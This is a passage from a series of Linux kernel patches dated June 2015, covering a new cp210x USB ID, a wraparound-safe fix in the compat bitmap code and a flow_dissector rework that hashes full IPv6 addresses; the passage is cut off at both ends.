(BPF_IS_REDIRECT_INGRESS(flags)) return dev_forward_skb(dev, skb2); From df72d588c54dad57dabb3cc8a87475d8ed66d806 Mon Sep 17 00:00:00 2001 From: "John D. Blair" Date: Thu, 4 Jun 2015 13:18:19 -0700 Subject: [PATCH 693/872] USB: cp210x: add ID for HubZ dual ZigBee and Z-Wave dongle Added the USB serial device ID for the HubZ dual ZigBee and Z-Wave radio dongle. Signed-off-by: John D. Blair Cc: stable Signed-off-by: Johan Hovold --- drivers/usb/serial/cp210x.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c index 9031750e7404..ffd739e31bfc 100644 --- a/drivers/usb/serial/cp210x.c +++ b/drivers/usb/serial/cp210x.c @@ -128,6 +128,7 @@ static const struct usb_device_id id_table[] = { { USB_DEVICE(0x10C4, 0x8946) }, /* Ketra N1 Wireless Interface */ { USB_DEVICE(0x10C4, 0x8977) }, /* CEL MeshWorks DevKit Device */ { USB_DEVICE(0x10C4, 0x8998) }, /* KCF Technologies PRN */ + { USB_DEVICE(0x10C4, 0x8A2A) }, /* HubZ dual ZigBee and Z-Wave dongle */ { USB_DEVICE(0x10C4, 0xEA60) }, /* Silicon Labs factory default */ { USB_DEVICE(0x10C4, 0xEA61) }, /* Silicon Labs factory default */ { USB_DEVICE(0x10C4, 0xEA70) }, /* Silicon Labs factory default */ From 9b7b819ca1e508195feed5ece558dca66adeef05 Mon Sep 17 00:00:00 2001 From: Helge Deller Date: Thu, 4 Jun 2015 23:57:18 +0200 Subject: [PATCH 694/872] compat: cleanup coding in compat_get_bitmap() and compat_put_bitmap() In the functions compat_get_bitmap() and compat_put_bitmap() the variable nr_compat_longs stores how many compat_ulong_t words should be copied in a loop. 
The copy loop itself is this: if (nr_compat_longs-- > 0) { if (__get_user(um, umask)) return -EFAULT; } else { um = 0; } Since nr_compat_longs gets unconditionally decremented in each loop and since it's type is unsigned this could theoretically lead to out of bounds accesses to userspace if nr_compat_longs wraps around to (unsigned)(-1). Although the callers currently do not trigger out-of-bounds accesses, we should better implement the loop in a safe way to completely avoid such warp-arounds. Signed-off-by: Helge Deller Cc: Linus Torvalds Cc: Al Viro --- kernel/compat.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/kernel/compat.c b/kernel/compat.c index 24f00610c575..333d364be29d 100644 --- a/kernel/compat.c +++ b/kernel/compat.c @@ -912,7 +912,8 @@ long compat_get_bitmap(unsigned long *mask, const compat_ulong_t __user *umask, * bitmap. We must however ensure the end of the * kernel bitmap is zeroed. */ - if (nr_compat_longs-- > 0) { + if (nr_compat_longs) { + nr_compat_longs--; if (__get_user(um, umask)) return -EFAULT; } else { @@ -954,7 +955,8 @@ long compat_put_bitmap(compat_ulong_t __user *umask, unsigned long *mask, * We dont want to write past the end of the userspace * bitmap. */ - if (nr_compat_longs-- > 0) { + if (nr_compat_longs) { + nr_compat_longs--; if (__put_user(um, umask)) return -EFAULT; } From ffaa31d7945f14edb04d7b2792a1dbd3a854a2bc Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Thu, 4 Jun 2015 20:11:00 +0530 Subject: [PATCH 695/872] atm:he - Do not initialise statics to 0. According to false is always '0' and Static variables are initialised to 0 by GCC. Signed-off-by: Shailendra Verma Signed-off-by: David S. Miller --- drivers/atm/he.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/atm/he.c b/drivers/atm/he.c index 0237271e80fc..a8da3a50e374 100644 --- a/drivers/atm/he.c +++ b/drivers/atm/he.c @@ -117,7 +117,7 @@ static short nvpibits = -1; static short nvcibits = -1; static short rx_skb_reserve = 16; static bool irq_coalesce = true; -static bool sdh = 0; +static bool sdh; /* Read from EEPROM = 0000 0011b */ static unsigned int readtab[] = { From ce3b5355477ce99bffa60a6a215f2e11db4b649c Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:36 -0700 Subject: [PATCH 696/872] net: Simplify GRE case in flow_dissector Do break when we see routing flag or a non-zero version number in GRE header. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. 
Miller --- net/core/flow_dissector.c | 44 +++++++++++++++++++-------------------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 1f2d89300b1a..7f699169dc92 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -308,30 +308,30 @@ bool __skb_flow_dissect(const struct sk_buff *skb, * Only look inside GRE if version zero and no * routing */ - if (!(hdr->flags & (GRE_VERSION|GRE_ROUTING))) { - proto = hdr->proto; + if (hdr->flags & (GRE_VERSION | GRE_ROUTING)) + break; + + proto = hdr->proto; + nhoff += 4; + if (hdr->flags & GRE_CSUM) nhoff += 4; - if (hdr->flags & GRE_CSUM) - nhoff += 4; - if (hdr->flags & GRE_KEY) - nhoff += 4; - if (hdr->flags & GRE_SEQ) - nhoff += 4; - if (proto == htons(ETH_P_TEB)) { - const struct ethhdr *eth; - struct ethhdr _eth; - - eth = __skb_header_pointer(skb, nhoff, - sizeof(_eth), - data, hlen, &_eth); - if (!eth) - return false; - proto = eth->h_proto; - nhoff += sizeof(*eth); - } - goto again; + if (hdr->flags & GRE_KEY) + nhoff += 4; + if (hdr->flags & GRE_SEQ) + nhoff += 4; + if (proto == htons(ETH_P_TEB)) { + const struct ethhdr *eth; + struct ethhdr _eth; + + eth = __skb_header_pointer(skb, nhoff, + sizeof(_eth), + data, hlen, &_eth); + if (!eth) + return false; + proto = eth->h_proto; + nhoff += sizeof(*eth); } - break; + goto again; } case IPPROTO_IPIP: proto = htons(ETH_P_IP); From 730fc4371333636a00fed32c587fc1e85c5367e2 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:37 -0700 Subject: [PATCH 697/872] mpls: Add definition for IPPROTO_MPLS Add uapi define for MPLS over IP. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/uapi/linux/in.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/include/uapi/linux/in.h b/include/uapi/linux/in.h index 589ced069e8a..641338bef651 100644 --- a/include/uapi/linux/in.h +++ b/include/uapi/linux/in.h @@ -69,6 +69,8 @@ enum { #define IPPROTO_SCTP IPPROTO_SCTP IPPROTO_UDPLITE = 136, /* UDP-Lite (RFC 3828) */ #define IPPROTO_UDPLITE IPPROTO_UDPLITE + IPPROTO_MPLS = 137, /* MPLS in IP (RFC 4023) */ +#define IPPROTO_MPLS IPPROTO_MPLS IPPROTO_RAW = 255, /* Raw IP packets */ #define IPPROTO_RAW IPPROTO_RAW IPPROTO_MAX From c468efe2c7d478bad8855f7d170cf245ee0f1b3f Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:38 -0700 Subject: [PATCH 698/872] net: Remove superfluous setting of key_basic key_basic is set twice in __skb_flow_dissect which seems unnecessary. Remove second one. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- net/core/flow_dissector.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 7f699169dc92..0763795bea8f 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -343,12 +343,6 @@ bool __skb_flow_dissect(const struct sk_buff *skb, break; } - /* It is ensured by skb_flow_dissector_init() that basic key will - * be always present. 
- */ - key_basic = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_BASIC, - target_container); key_basic->n_proto = proto; key_basic->ip_proto = ip_proto; key_basic->thoff = (u16) nhoff; From 42aecaa9bb2bd57eb8d61b4565cee5d3640863fb Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:39 -0700 Subject: [PATCH 699/872] net: Get skb hash over flow_keys structure This patch changes flow hashing to use jhash2 over the flow_keys structure instead just doing jhash_3words over src, dst, and ports. This method will allow us take more input into the hashing function so that we can include full IPv6 addresses, VLAN, flow labels etc. without needing to resort to xor'ing which makes for a poor hash. Acked-by: Jiri Pirko Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- include/linux/skbuff.h | 2 +- include/net/flow_dissector.h | 21 ++++++++++++-- include/net/ip.h | 2 ++ include/net/ipv6.h | 2 ++ net/core/flow_dissector.c | 54 +++++++++++++++++++++++++++--------- net/sched/cls_flower.c | 2 ++ 6 files changed, 66 insertions(+), 17 deletions(-) diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h index 6b41c15efa27..cc612fc0a894 100644 --- a/include/linux/skbuff.h +++ b/include/linux/skbuff.h @@ -1943,7 +1943,7 @@ static inline void skb_probe_transport_header(struct sk_buff *skb, if (skb_transport_header_was_set(skb)) return; else if (skb_flow_dissect_flow_keys(skb, &keys)) - skb_set_transport_header(skb, keys.basic.thoff); + skb_set_transport_header(skb, keys.control.thoff); else skb_set_transport_header(skb, offset_hint); } diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index bac9c1421f58..cba6a10b214a 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -6,6 +6,15 @@ #include #include +/** + * struct flow_dissector_key_control: + * @thoff: Transport header offset + */ +struct flow_dissector_key_control { + u16 thoff; + u16 padding; +}; + /** * struct flow_dissector_key_basic: * @thoff: Transport header offset @@ -13,9 +22,9 @@ * @ip_proto: Transport header protocol (eg. 
TCP/UDP) */ struct flow_dissector_key_basic { - u16 thoff; __be16 n_proto; u8 ip_proto; + u8 padding; }; /** @@ -70,6 +79,7 @@ struct flow_dissector_key_eth_addrs { }; enum flow_dissector_key_id { + FLOW_DISSECTOR_KEY_CONTROL, /* struct flow_dissector_key_control */ FLOW_DISSECTOR_KEY_BASIC, /* struct flow_dissector_key_basic */ FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ @@ -109,11 +119,16 @@ static inline bool skb_flow_dissect(const struct sk_buff *skb, } struct flow_keys { - struct flow_dissector_key_addrs addrs; - struct flow_dissector_key_ports ports; + struct flow_dissector_key_control control; +#define FLOW_KEYS_HASH_START_FIELD basic struct flow_dissector_key_basic basic; + struct flow_dissector_key_ports ports; + struct flow_dissector_key_addrs addrs; }; +#define FLOW_KEYS_HASH_OFFSET \ + offsetof(struct flow_keys, FLOW_KEYS_HASH_START_FIELD) + extern struct flow_dissector flow_keys_dissector; extern struct flow_dissector flow_keys_buf_dissector; diff --git a/include/net/ip.h b/include/net/ip.h index 9b976cf99122..16cfc87fed6c 100644 --- a/include/net/ip.h +++ b/include/net/ip.h @@ -360,6 +360,8 @@ static inline void inet_set_txhash(struct sock *sk) struct inet_sock *inet = inet_sk(sk); struct flow_keys keys; + memset(&keys, 0, sizeof(keys)); + keys.addrs.src = inet->inet_saddr; keys.addrs.dst = inet->inet_daddr; keys.ports.src = inet->inet_sport; diff --git a/include/net/ipv6.h b/include/net/ipv6.h index 35d485c78080..474ca466a091 100644 --- a/include/net/ipv6.h +++ b/include/net/ipv6.h @@ -699,6 +699,8 @@ static inline void ip6_set_txhash(struct sock *sk) struct ipv6_pinfo *np = inet6_sk(sk); struct flow_keys keys; + memset(&keys, 0, sizeof(keys)); + keys.addrs.src = (__force __be32)ipv6_addr_hash(&np->saddr); keys.addrs.dst = (__force __be32)ipv6_addr_hash(&sk->sk_v6_daddr); keys.ports.src = inet->inet_sport; diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 0763795bea8f..55b5f2962afa 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -57,9 +57,11 @@ void skb_flow_dissector_init(struct flow_dissector *flow_dissector, flow_dissector->offset[key->key_id] = key->offset; } - /* Ensure that the dissector always includes basic key. That way - * we are able to avoid handling lack of it in fast path. + /* Ensure that the dissector always includes control and basic key. + * That way we are able to avoid handling lack of these in fast path. */ + BUG_ON(!skb_flow_dissector_uses_key(flow_dissector, + FLOW_DISSECTOR_KEY_CONTROL)); BUG_ON(!skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_BASIC)); } @@ -120,6 +122,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, void *target_container, void *data, __be16 proto, int nhoff, int hlen) { + struct flow_dissector_key_control *key_control; struct flow_dissector_key_basic *key_basic; struct flow_dissector_key_addrs *key_addrs; struct flow_dissector_key_ports *key_ports; @@ -132,6 +135,13 @@ bool __skb_flow_dissect(const struct sk_buff *skb, hlen = skb_headlen(skb); } + /* It is ensured by skb_flow_dissector_init() that control key will + * be always present. + */ + key_control = skb_flow_dissector_target(flow_dissector, + FLOW_DISSECTOR_KEY_CONTROL, + target_container); + /* It is ensured by skb_flow_dissector_init() that basic key will * be always present. 
*/ @@ -219,7 +229,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_basic->n_proto = proto; key_basic->ip_proto = ip_proto; - key_basic->thoff = (u16)nhoff; + key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_PORTS)) { @@ -275,7 +285,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, if (!hdr) return false; key_basic->n_proto = proto; - key_basic->thoff = (u16)nhoff; + key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS)) { @@ -288,7 +298,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, return true; } case htons(ETH_P_FCOE): - key_basic->thoff = (u16)(nhoff + FCOE_HEADER_LEN); + key_control->thoff = (u16)(nhoff + FCOE_HEADER_LEN); /* fall through */ default: return false; @@ -345,7 +355,7 @@ bool __skb_flow_dissect(const struct sk_buff *skb, key_basic->n_proto = proto; key_basic->ip_proto = ip_proto; - key_basic->thoff = (u16) nhoff; + key_control->thoff = (u16)nhoff; if (skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_PORTS)) { @@ -366,9 +376,21 @@ static __always_inline void __flow_hash_secret_init(void) net_get_random_once(&hashrnd, sizeof(hashrnd)); } -static __always_inline u32 __flow_hash_3words(u32 a, u32 b, u32 c, u32 keyval) +static __always_inline u32 __flow_hash_words(u32 *words, u32 length, u32 keyval) +{ + return jhash2(words, length, keyval); +} + +static inline void *flow_keys_hash_start(struct flow_keys *flow) { - return jhash_3words(a, b, c, keyval); + BUILD_BUG_ON(FLOW_KEYS_HASH_OFFSET % sizeof(u32)); + return (void *)flow + FLOW_KEYS_HASH_OFFSET; +} + +static inline size_t flow_keys_hash_length(struct flow_keys *flow) +{ + BUILD_BUG_ON((sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) % sizeof(u32)); + return (sizeof(*flow) - FLOW_KEYS_HASH_OFFSET) / sizeof(u32); } static inline u32 __flow_hash_from_keys(struct flow_keys *keys, u32 keyval) @@ -383,10 +405,8 @@ static inline u32 __flow_hash_from_keys(struct flow_keys *keys, u32 keyval) swap(keys->ports.src, keys->ports.dst); } - hash = __flow_hash_3words((__force u32)keys->addrs.dst, - (__force u32)keys->addrs.src, - (__force u32)keys->ports.ports, - keyval); + hash = __flow_hash_words((u32 *)flow_keys_hash_start(keys), + flow_keys_hash_length(keys), keyval); if (!hash) hash = 1; @@ -473,7 +493,7 @@ EXPORT_SYMBOL(skb_get_hash_perturb); u32 __skb_get_poff(const struct sk_buff *skb, void *data, const struct flow_keys *keys, int hlen) { - u32 poff = keys->basic.thoff; + u32 poff = keys->control.thoff; switch (keys->basic.ip_proto) { case IPPROTO_TCP: { @@ -536,6 +556,10 @@ u32 skb_get_poff(const struct sk_buff *skb) } static const struct flow_dissector_key flow_keys_dissector_keys[] = { + { + .key_id = FLOW_DISSECTOR_KEY_CONTROL, + .offset = offsetof(struct flow_keys, control), + }, { .key_id = FLOW_DISSECTOR_KEY_BASIC, .offset = offsetof(struct flow_keys, basic), @@ -555,6 +579,10 @@ static const struct flow_dissector_key flow_keys_dissector_keys[] = { }; static const struct flow_dissector_key flow_keys_buf_dissector_keys[] = { + { + .key_id = FLOW_DISSECTOR_KEY_CONTROL, + .offset = offsetof(struct flow_keys, control), + }, { .key_id = FLOW_DISSECTOR_KEY_BASIC, .offset = offsetof(struct flow_keys, basic), diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c index 8c8f34ef6980..5a7d66c59684 100644 --- a/net/sched/cls_flower.c +++ b/net/sched/cls_flower.c @@ -25,6 +25,7 @@ struct fl_flow_key { int indev_ifindex; + struct flow_dissector_key_control control; struct 
flow_dissector_key_basic basic; struct flow_dissector_key_eth_addrs eth; union { @@ -347,6 +348,7 @@ static void fl_init_dissector(struct cls_fl_head *head, struct flow_dissector_key keys[FLOW_DISSECTOR_KEY_MAX]; size_t cnt = 0; + FL_KEY_SET(keys, cnt, FLOW_DISSECTOR_KEY_CONTROL, control); FL_KEY_SET(keys, cnt, FLOW_DISSECTOR_KEY_BASIC, basic); FL_KEY_SET_IF_IN_RANGE(mask, keys, cnt, FLOW_DISSECTOR_KEY_ETH_ADDRS, eth); From c3f8324188fa80178f20c8209b492ca6191177e8 Mon Sep 17 00:00:00 2001 From: Tom Herbert Date: Thu, 4 Jun 2015 09:16:40 -0700 Subject: [PATCH 700/872] net: Add full IPv6 addresses to flow_keys This patch adds full IPv6 addresses into flow_keys and uses them as input to the flow hash function. The implementation supports either IPv4 or IPv6 addresses in a union, and selector is used to determine how may words to input to jhash2. We also add flow_get_u32_dst and flow_get_u32_src functions which are used to get a u32 representation of the source and destination addresses. For IPv6, ipv6_addr_hash is called. These functions retain getting the legacy values of src and dst in flow_keys. With this patch, Ethertype and IP protocol are now included in the flow hash input. Signed-off-by: Tom Herbert Signed-off-by: David S. Miller --- drivers/net/bonding/bond_main.c | 9 +- drivers/net/ethernet/cisco/enic/enic_clsf.c | 8 +- .../net/ethernet/cisco/enic/enic_ethtool.c | 4 +- include/net/flow_dissector.h | 52 +++++--- include/net/ip.h | 19 ++- include/net/ipv6.h | 21 +++- net/core/flow_dissector.c | 116 +++++++++++++++--- net/ethernet/eth.c | 2 +- net/sched/cls_flow.c | 14 ++- net/sched/cls_flower.c | 11 +- 10 files changed, 193 insertions(+), 63 deletions(-) diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c index 2268438f3f63..19eb990d398c 100644 --- a/drivers/net/bonding/bond_main.c +++ b/drivers/net/bonding/bond_main.c @@ -3059,8 +3059,7 @@ static bool bond_flow_dissect(struct bonding *bond, struct sk_buff *skb, if (unlikely(!pskb_may_pull(skb, noff + sizeof(*iph)))) return false; iph = ip_hdr(skb); - fk->addrs.src = iph->saddr; - fk->addrs.dst = iph->daddr; + iph_to_flow_copy_v4addrs(fk, iph); noff += iph->ihl << 2; if (!ip_is_fragment(iph)) proto = iph->protocol; @@ -3068,8 +3067,7 @@ static bool bond_flow_dissect(struct bonding *bond, struct sk_buff *skb, if (unlikely(!pskb_may_pull(skb, noff + sizeof(*iph6)))) return false; iph6 = ipv6_hdr(skb); - fk->addrs.src = (__force __be32)ipv6_addr_hash(&iph6->saddr); - fk->addrs.dst = (__force __be32)ipv6_addr_hash(&iph6->daddr); + iph_to_flow_copy_v6addrs(fk, iph6); noff += sizeof(*iph6); proto = iph6->nexthdr; } else { @@ -3103,7 +3101,8 @@ u32 bond_xmit_hash(struct bonding *bond, struct sk_buff *skb) hash = bond_eth_hash(skb); else hash = (__force u32)flow.ports.ports; - hash ^= (__force u32)flow.addrs.dst ^ (__force u32)flow.addrs.src; + hash ^= (__force u32)flow_get_u32_dst(&flow) ^ + (__force u32)flow_get_u32_src(&flow); hash ^= (hash >> 16); hash ^= (hash >> 8); diff --git a/drivers/net/ethernet/cisco/enic/enic_clsf.c b/drivers/net/ethernet/cisco/enic/enic_clsf.c index a31b57adcb37..d106186f4f4a 100644 --- a/drivers/net/ethernet/cisco/enic/enic_clsf.c +++ b/drivers/net/ethernet/cisco/enic/enic_clsf.c @@ -33,8 +33,8 @@ int enic_addfltr_5t(struct enic *enic, struct flow_keys *keys, u16 rq) return -EPROTONOSUPPORT; }; data.type = FILTER_IPV4_5TUPLE; - data.u.ipv4.src_addr = ntohl(keys->addrs.src); - data.u.ipv4.dst_addr = ntohl(keys->addrs.dst); + data.u.ipv4.src_addr = ntohl(keys->addrs.v4addrs.src); + 
data.u.ipv4.dst_addr = ntohl(keys->addrs.v4addrs.dst); data.u.ipv4.src_port = ntohs(keys->ports.src); data.u.ipv4.dst_port = ntohs(keys->ports.dst); data.u.ipv4.flags = FILTER_FIELDS_IPV4_5TUPLE; @@ -158,8 +158,8 @@ static struct enic_rfs_fltr_node *htbl_key_search(struct hlist_head *h, struct enic_rfs_fltr_node *tpos; hlist_for_each_entry(tpos, h, node) - if (tpos->keys.addrs.src == k->addrs.src && - tpos->keys.addrs.dst == k->addrs.dst && + if (tpos->keys.addrs.v4addrs.src == k->addrs.v4addrs.src && + tpos->keys.addrs.v4addrs.dst == k->addrs.v4addrs.dst && tpos->keys.ports.ports == k->ports.ports && tpos->keys.basic.ip_proto == k->basic.ip_proto && tpos->keys.basic.n_proto == k->basic.n_proto) diff --git a/drivers/net/ethernet/cisco/enic/enic_ethtool.c b/drivers/net/ethernet/cisco/enic/enic_ethtool.c index 117c0968dd0b..73874b2575bf 100644 --- a/drivers/net/ethernet/cisco/enic/enic_ethtool.c +++ b/drivers/net/ethernet/cisco/enic/enic_ethtool.c @@ -346,10 +346,10 @@ static int enic_grxclsrule(struct enic *enic, struct ethtool_rxnfc *cmd) break; } - fsp->h_u.tcp_ip4_spec.ip4src = n->keys.addrs.src; + fsp->h_u.tcp_ip4_spec.ip4src = flow_get_u32_src(&n->keys); fsp->m_u.tcp_ip4_spec.ip4src = (__u32)~0; - fsp->h_u.tcp_ip4_spec.ip4dst = n->keys.addrs.dst; + fsp->h_u.tcp_ip4_spec.ip4dst = flow_get_u32_dst(&n->keys); fsp->m_u.tcp_ip4_spec.ip4dst = (__u32)~0; fsp->h_u.tcp_ip4_spec.psrc = n->keys.ports.src; diff --git a/include/net/flow_dissector.h b/include/net/flow_dissector.h index cba6a10b214a..306d4613abbb 100644 --- a/include/net/flow_dissector.h +++ b/include/net/flow_dissector.h @@ -12,7 +12,7 @@ */ struct flow_dissector_key_control { u16 thoff; - u16 padding; + u16 addr_type; }; /** @@ -28,18 +28,39 @@ struct flow_dissector_key_basic { }; /** - * struct flow_dissector_key_addrs: - * @src: source ip address in case of IPv4 - * For IPv6 it contains 32bit hash of src address - * @dst: destination ip address in case of IPv4 - * For IPv6 it contains 32bit hash of dst address + * struct flow_dissector_key_ipv4_addrs: + * @src: source ip address + * @dst: destination ip address */ -struct flow_dissector_key_addrs { +struct flow_dissector_key_ipv4_addrs { /* (src,dst) must be grouped, in the same way than in IP header */ __be32 src; __be32 dst; }; +/** + * struct flow_dissector_key_ipv6_addrs: + * @src: source ip address + * @dst: destination ip address + */ +struct flow_dissector_key_ipv6_addrs { + /* (src,dst) must be grouped, in the same way than in IP header */ + struct in6_addr src; + struct in6_addr dst; +}; + +/** + * struct flow_dissector_key_addrs: + * @v4addrs: IPv4 addresses + * @v6addrs: IPv6 addresses + */ +struct flow_dissector_key_addrs { + union { + struct flow_dissector_key_ipv4_addrs v4addrs; + struct flow_dissector_key_ipv6_addrs v6addrs; + }; +}; + /** * flow_dissector_key_tp_ports: * @ports: port numbers of Transport header @@ -56,16 +77,6 @@ struct flow_dissector_key_ports { }; }; -/** - * struct flow_dissector_key_ipv6_addrs: - * @src: source ip address - * @dst: destination ip address - */ -struct flow_dissector_key_ipv6_addrs { - /* (src,dst) must be grouped, in the same way than in IP header */ - struct in6_addr src; - struct in6_addr dst; -}; /** * struct flow_dissector_key_eth_addrs: @@ -81,10 +92,10 @@ struct flow_dissector_key_eth_addrs { enum flow_dissector_key_id { FLOW_DISSECTOR_KEY_CONTROL, /* struct flow_dissector_key_control */ FLOW_DISSECTOR_KEY_BASIC, /* struct flow_dissector_key_basic */ - FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_addrs */ + 
FLOW_DISSECTOR_KEY_IPV4_ADDRS, /* struct flow_dissector_key_ipv4_addrs */ + FLOW_DISSECTOR_KEY_IPV6_ADDRS, /* struct flow_dissector_key_ipv6_addrs */ FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, /* struct flow_dissector_key_addrs */ FLOW_DISSECTOR_KEY_PORTS, /* struct flow_dissector_key_ports */ - FLOW_DISSECTOR_KEY_IPV6_ADDRS, /* struct flow_dissector_key_ipv6_addrs */ FLOW_DISSECTOR_KEY_ETH_ADDRS, /* struct flow_dissector_key_eth_addrs */ FLOW_DISSECTOR_KEY_MAX, @@ -129,6 +140,9 @@ struct flow_keys { #define FLOW_KEYS_HASH_OFFSET \ offsetof(struct flow_keys, FLOW_KEYS_HASH_START_FIELD) +__be32 flow_get_u32_src(const struct flow_keys *flow); +__be32 flow_get_u32_dst(const struct flow_keys *flow); + extern struct flow_dissector flow_keys_dissector; extern struct flow_dissector flow_keys_buf_dissector; diff --git a/include/net/ip.h b/include/net/ip.h index 16cfc87fed6c..0750a186ea63 100644 --- a/include/net/ip.h +++ b/include/net/ip.h @@ -355,6 +355,20 @@ static inline __wsum inet_compute_pseudo(struct sk_buff *skb, int proto) skb->len, proto, 0); } +/* copy IPv4 saddr & daddr to flow_keys, possibly using 64bit load/store + * Equivalent to : flow->v4addrs.src = iph->saddr; + * flow->v4addrs.dst = iph->daddr; + */ +static inline void iph_to_flow_copy_v4addrs(struct flow_keys *flow, + const struct iphdr *iph) +{ + BUILD_BUG_ON(offsetof(typeof(flow->addrs), v4addrs.dst) != + offsetof(typeof(flow->addrs), v4addrs.src) + + sizeof(flow->addrs.v4addrs.src)); + memcpy(&flow->addrs.v4addrs, &iph->saddr, sizeof(flow->addrs.v4addrs)); + flow->control.addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; +} + static inline void inet_set_txhash(struct sock *sk) { struct inet_sock *inet = inet_sk(sk); @@ -362,8 +376,9 @@ static inline void inet_set_txhash(struct sock *sk) memset(&keys, 0, sizeof(keys)); - keys.addrs.src = inet->inet_saddr; - keys.addrs.dst = inet->inet_daddr; + keys.addrs.v4addrs.src = inet->inet_saddr; + keys.addrs.v4addrs.dst = inet->inet_daddr; + keys.control.addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; keys.ports.src = inet->inet_sport; keys.ports.dst = inet->inet_dport; diff --git a/include/net/ipv6.h b/include/net/ipv6.h index 474ca466a091..82dbdb092a5d 100644 --- a/include/net/ipv6.h +++ b/include/net/ipv6.h @@ -692,6 +692,20 @@ static inline int ip6_sk_dst_hoplimit(struct ipv6_pinfo *np, struct flowi6 *fl6, return hlimit; } +/* copy IPv6 saddr & daddr to flow_keys, possibly using 64bit load/store + * Equivalent to : flow->v6addrs.src = iph->saddr; + * flow->v6addrs.dst = iph->daddr; + */ +static inline void iph_to_flow_copy_v6addrs(struct flow_keys *flow, + const struct ipv6hdr *iph) +{ + BUILD_BUG_ON(offsetof(typeof(flow->addrs), v6addrs.dst) != + offsetof(typeof(flow->addrs), v6addrs.src) + + sizeof(flow->addrs.v6addrs.src)); + memcpy(&flow->addrs.v6addrs, &iph->saddr, sizeof(flow->addrs.v6addrs)); + flow->control.addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; +} + #if IS_ENABLED(CONFIG_IPV6) static inline void ip6_set_txhash(struct sock *sk) { @@ -701,8 +715,11 @@ static inline void ip6_set_txhash(struct sock *sk) memset(&keys, 0, sizeof(keys)); - keys.addrs.src = (__force __be32)ipv6_addr_hash(&np->saddr); - keys.addrs.dst = (__force __be32)ipv6_addr_hash(&sk->sk_v6_daddr); + memcpy(&keys.addrs.v6addrs.src, &np->saddr, + sizeof(keys.addrs.v6addrs.src)); + memcpy(&keys.addrs.v6addrs.dst, &sk->sk_v6_daddr, + sizeof(keys.addrs.v6addrs.dst)); + keys.control.addr_type = FLOW_DISSECTOR_KEY_IPV6_ADDRS; keys.ports.src = inet->inet_sport; keys.ports.dst = inet->inet_dport; diff --git 
a/net/core/flow_dissector.c b/net/core/flow_dissector.c index 55b5f2962afa..ca9d22488cfb 100644 --- a/net/core/flow_dissector.c +++ b/net/core/flow_dissector.c @@ -178,10 +178,12 @@ bool __skb_flow_dissect(const struct sk_buff *skb, if (!skb_flow_dissector_uses_key(flow_dissector, FLOW_DISSECTOR_KEY_IPV4_ADDRS)) break; + key_addrs = skb_flow_dissector_target(flow_dissector, - FLOW_DISSECTOR_KEY_IPV4_ADDRS, - target_container); - memcpy(key_addrs, &iph->saddr, sizeof(*key_addrs)); + FLOW_DISSECTOR_KEY_IPV4_ADDRS, target_container); + memcpy(&key_addrs->v4addrs, &iph->saddr, + sizeof(key_addrs->v4addrs)); + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; break; } case htons(ETH_P_IPV6): { @@ -203,8 +205,11 @@ bool __skb_flow_dissect(const struct sk_buff *skb, FLOW_DISSECTOR_KEY_IPV6_HASH_ADDRS, target_container); - key_addrs->src = (__force __be32)ipv6_addr_hash(&iph->saddr); - key_addrs->dst = (__force __be32)ipv6_addr_hash(&iph->daddr); + key_addrs->v4addrs.src = + (__force __be32)ipv6_addr_hash(&iph->saddr); + key_addrs->v4addrs.dst = + (__force __be32)ipv6_addr_hash(&iph->daddr); + key_control->addr_type = FLOW_DISSECTOR_KEY_IPV4_ADDRS; goto flow_label; } if (skb_flow_dissector_uses_key(flow_dissector, @@ -216,6 